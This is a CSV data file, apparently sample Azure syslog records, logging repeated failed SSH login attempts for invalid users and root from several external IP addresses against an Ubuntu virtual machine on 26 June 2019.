+5492,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:14:55,UbuntuDevEnv,2019-06-26 16:14:54,auth,UbuntuDevEnv,info,"Received disconnect from 125.212.254.144 port 49614:11: Normal Shutdown, Thank you for playing [preauth]",32831,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,125.212.254.1,49614,,
+5493,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:14:55,UbuntuDevEnv,2019-06-26 16:14:54,auth,UbuntuDevEnv,info,Disconnected from invalid user ftpuser 125.212.254.144 port 49614 [preauth],32831,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftpuser,125.212.254.1,49614,,
+5494,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:15:12,UbuntuDevEnv,2019-06-26 16:15:11,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,32924,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5495,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:15:12,UbuntuDevEnv,2019-06-26 16:15:11,auth,UbuntuDevEnv,info,Invalid user appuser from 66.70.130.155 port 37800,32924,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,appuser,66.70.130.1,37800,,
+5496,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:15:12,UbuntuDevEnv,2019-06-26 16:15:11,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=66.70.130.155,32924,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,66.70.130.1,,0,
+5497,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:15:13,UbuntuDevEnv,2019-06-26 16:15:13,auth,UbuntuDevEnv,info,Failed password for invalid user appuser from 66.70.130.155 port 37800 ssh2,32924,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,appuser,66.70.130.1,37800,,
+5498,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:15:13,UbuntuDevEnv,2019-06-26 16:15:13,auth,UbuntuDevEnv,info,Received disconnect from 66.70.130.155 port 37800:11: Bye Bye [preauth],32924,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,66.70.130.1,37800,,
+5499,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:15:13,UbuntuDevEnv,2019-06-26 16:15:13,auth,UbuntuDevEnv,info,Disconnected from invalid user appuser 66.70.130.155 port 37800 [preauth],32924,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,appuser,66.70.130.1,37800,,
+5500,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:17:16,UbuntuDevEnv,2019-06-26 16:17:15,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,33416,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5501,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:17:16,UbuntuDevEnv,2019-06-26 16:17:15,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=66.70.130.155,33416,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,66.70.130.1,,0,
+5502,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:17:16,UbuntuDevEnv,2019-06-26 16:17:15,auth,UbuntuDevEnv,info,Invalid user demon from 66.70.130.155 port 54778,33416,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,demon,66.70.130.1,54778,,
+5503,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:17:18,UbuntuDevEnv,2019-06-26 16:17:18,auth,UbuntuDevEnv,info,Failed password for invalid user demon from 66.70.130.155 port 54778 ssh2,33416,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,demon,66.70.130.1,54778,,
+5504,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:17:18,UbuntuDevEnv,2019-06-26 16:17:18,auth,UbuntuDevEnv,info,Disconnected from invalid user demon 66.70.130.155 port 54778 [preauth],33416,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,demon,66.70.130.1,54778,,
+5505,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:17:18,UbuntuDevEnv,2019-06-26 16:17:18,auth,UbuntuDevEnv,info,Received disconnect from 66.70.130.155 port 54778:11: Bye Bye [preauth],33416,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,66.70.130.1,54778,,
+5506,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:19:12,UbuntuDevEnv,2019-06-26 16:19:11,auth,UbuntuDevEnv,info,Invalid user ubuntu from 66.70.130.155 port 43528,33829,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubuntu,66.70.130.1,43528,,
+5507,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:19:12,UbuntuDevEnv,2019-06-26 16:19:11,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,33829,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5508,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:19:12,UbuntuDevEnv,2019-06-26 16:19:11,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=66.70.130.155,33829,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,66.70.130.1,,0,
+5509,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:19:13,UbuntuDevEnv,2019-06-26 16:19:13,auth,UbuntuDevEnv,info,Failed password for invalid user ubuntu from 66.70.130.155 port 43528 ssh2,33829,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubuntu,66.70.130.1,43528,,
+5510,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:19:14,UbuntuDevEnv,2019-06-26 16:19:13,auth,UbuntuDevEnv,info,Received disconnect from 66.70.130.155 port 43528:11: Bye Bye [preauth],33829,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,66.70.130.1,43528,,
+5511,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:19:14,UbuntuDevEnv,2019-06-26 16:19:13,auth,UbuntuDevEnv,info,Disconnected from invalid user ubuntu 66.70.130.155 port 43528 [preauth],33829,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubuntu,66.70.130.1,43528,,
+5512,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:20:10,UbuntuDevEnv,2019-06-26 16:20:10,auth,UbuntuDevEnv,info,Did not receive identification string from 35.154.19.93 port 34100,34040,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,34100,,
+5513,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:21:19,UbuntuDevEnv,2019-06-26 16:21:18,auth,UbuntuDevEnv,info,Invalid user burner from 66.70.130.155 port 60506,34275,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,burner,66.70.130.1,60506,,
+5514,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:21:19,UbuntuDevEnv,2019-06-26 16:21:18,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,34275,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5515,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:21:19,UbuntuDevEnv,2019-06-26 16:21:18,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=66.70.130.155,34275,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,66.70.130.1,,0,
+5516,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:21:21,UbuntuDevEnv,2019-06-26 16:21:21,auth,UbuntuDevEnv,info,Failed password for invalid user burner from 66.70.130.155 port 60506 ssh2,34275,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,burner,66.70.130.1,60506,,
+5517,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:21:21,UbuntuDevEnv,2019-06-26 16:21:21,auth,UbuntuDevEnv,info,Disconnected from invalid user burner 66.70.130.155 port 60506 [preauth],34275,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,burner,66.70.130.1,60506,,
+5518,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:21:21,UbuntuDevEnv,2019-06-26 16:21:21,auth,UbuntuDevEnv,info,Received disconnect from 66.70.130.155 port 60506:11: Bye Bye [preauth],34275,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,66.70.130.1,60506,,
+5519,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:21:50,UbuntuDevEnv,2019-06-26 16:21:50,auth,UbuntuDevEnv,info,Invalid user usuario from 207.154.232.160 port 38250,34693,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,usuario,207.154.232.1,38250,,
+5520,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:21:50,UbuntuDevEnv,2019-06-26 16:21:50,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,34693,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5521,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:21:50,UbuntuDevEnv,2019-06-26 16:21:50,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=207.154.232.160,34693,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,207.154.232.1,,0,
+5522,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:21:53,UbuntuDevEnv,2019-06-26 16:21:52,auth,UbuntuDevEnv,info,Failed password for invalid user usuario from 207.154.232.160 port 38250 ssh2,34693,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,usuario,207.154.232.1,38250,,
+5523,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:21:53,UbuntuDevEnv,2019-06-26 16:21:52,auth,UbuntuDevEnv,info,"Received disconnect from 207.154.232.160 port 38250:11: Normal Shutdown, Thank you for playing [preauth]",34693,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,207.154.232.1,38250,,
+5524,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:21:53,UbuntuDevEnv,2019-06-26 16:21:52,auth,UbuntuDevEnv,info,Disconnected from invalid user usuario 207.154.232.160 port 38250 [preauth],34693,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,usuario,207.154.232.1,38250,,
+5525,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:22:49,UbuntuDevEnv,2019-06-26 16:22:49,auth,UbuntuDevEnv,info,Invalid user nmurthy from 171.8.199.77 port 42310,34977,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nmurthy,171.8.199.7,42310,,
+5526,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:22:49,UbuntuDevEnv,2019-06-26 16:22:49,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=171.8.199.77,34977,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,171.8.199.7,,0,
+5527,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:22:49,UbuntuDevEnv,2019-06-26 16:22:49,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,34977,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5528,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:22:51,UbuntuDevEnv,2019-06-26 16:22:51,auth,UbuntuDevEnv,info,Failed password for invalid user nmurthy from 171.8.199.77 port 42310 ssh2,34977,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nmurthy,171.8.199.7,42310,,
+5529,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:22:52,UbuntuDevEnv,2019-06-26 16:22:51,auth,UbuntuDevEnv,info,Disconnected from invalid user nmurthy 171.8.199.77 port 42310 [preauth],34977,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nmurthy,171.8.199.7,42310,,
+5530,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:22:52,UbuntuDevEnv,2019-06-26 16:22:51,auth,UbuntuDevEnv,info,Received disconnect from 171.8.199.77 port 42310:11: Bye Bye [preauth],34977,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,171.8.199.7,42310,,
+5531,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:23:17,UbuntuDevEnv,2019-06-26 16:23:17,auth,UbuntuDevEnv,info,Invalid user dumbo from 66.70.130.155 port 49252,35065,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dumbo,66.70.130.1,49252,,
+5532,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:23:17,UbuntuDevEnv,2019-06-26 16:23:17,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,35065,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5533,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:23:17,UbuntuDevEnv,2019-06-26 16:23:17,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=66.70.130.155,35065,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,66.70.130.1,,0,
+5534,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:23:19,UbuntuDevEnv,2019-06-26 16:23:19,auth,UbuntuDevEnv,info,Failed password for invalid user dumbo from 66.70.130.155 port 49252 ssh2,35065,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dumbo,66.70.130.1,49252,,
+5535,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:23:20,UbuntuDevEnv,2019-06-26 16:23:19,auth,UbuntuDevEnv,info,Disconnected from invalid user dumbo 66.70.130.155 port 49252 [preauth],35065,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dumbo,66.70.130.1,49252,,
+5536,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:23:20,UbuntuDevEnv,2019-06-26 16:23:19,auth,UbuntuDevEnv,info,Received disconnect from 66.70.130.155 port 49252:11: Bye Bye [preauth],35065,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,66.70.130.1,49252,,
+5537,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:23:26,UbuntuDevEnv,2019-06-26 16:23:25,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93  user=root,35107,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,35.154.19.9,,0,
+5538,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:23:28,UbuntuDevEnv,2019-06-26 16:23:28,auth,UbuntuDevEnv,info,Failed password for root from 35.154.19.93 port 46358 ssh2,35107,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,46358,,
+5539,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:23:28,UbuntuDevEnv,2019-06-26 16:23:28,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 46358:11: Normal Shutdown, Thank you for playing [preauth]",35107,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,46358,,
+5540,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:23:28,UbuntuDevEnv,2019-06-26 16:23:28,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 35.154.19.93 port 46358 [preauth],35107,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,35.154.19.9,46358,,
+5541,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:23:56,UbuntuDevEnv,2019-06-26 16:23:55,auth,UbuntuDevEnv,info,Invalid user suporte from 203.113.10.153 port 9224,35210,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,suporte,203.113.10.1,9224,,
+5542,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:23:56,UbuntuDevEnv,2019-06-26 16:23:55,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=203.113.10.153,35210,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,203.113.10.1,,0,
+5543,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:23:56,UbuntuDevEnv,2019-06-26 16:23:55,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,35210,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5544,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:23:58,UbuntuDevEnv,2019-06-26 16:23:57,auth,UbuntuDevEnv,info,Failed password for invalid user suporte from 203.113.10.153 port 9224 ssh2,35210,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,suporte,203.113.10.1,9224,,
+5545,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:23:58,UbuntuDevEnv,2019-06-26 16:23:58,auth,UbuntuDevEnv,info,Connection closed by invalid user suporte 203.113.10.153 port 9224 [preauth],35210,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,suporte,203.113.10.1,9224,,invalid
+5546,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:23:59,UbuntuDevEnv,2019-06-26 16:23:58,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93  user=root,35222,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,35.154.19.9,,0,
+5547,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:24:01,UbuntuDevEnv,2019-06-26 16:24:01,auth,UbuntuDevEnv,info,Failed password for root from 35.154.19.93 port 49644 ssh2,35222,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,49644,,
+5548,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:24:02,UbuntuDevEnv,2019-06-26 16:24:01,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 49644:11: Normal Shutdown, Thank you for playing [preauth]",35222,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,49644,,
+5549,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:24:02,UbuntuDevEnv,2019-06-26 16:24:01,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 35.154.19.93 port 49644 [preauth],35222,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,35.154.19.9,49644,,
+5550,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:24:30,UbuntuDevEnv,2019-06-26 16:24:30,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93  user=root,35337,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,35.154.19.9,,0,
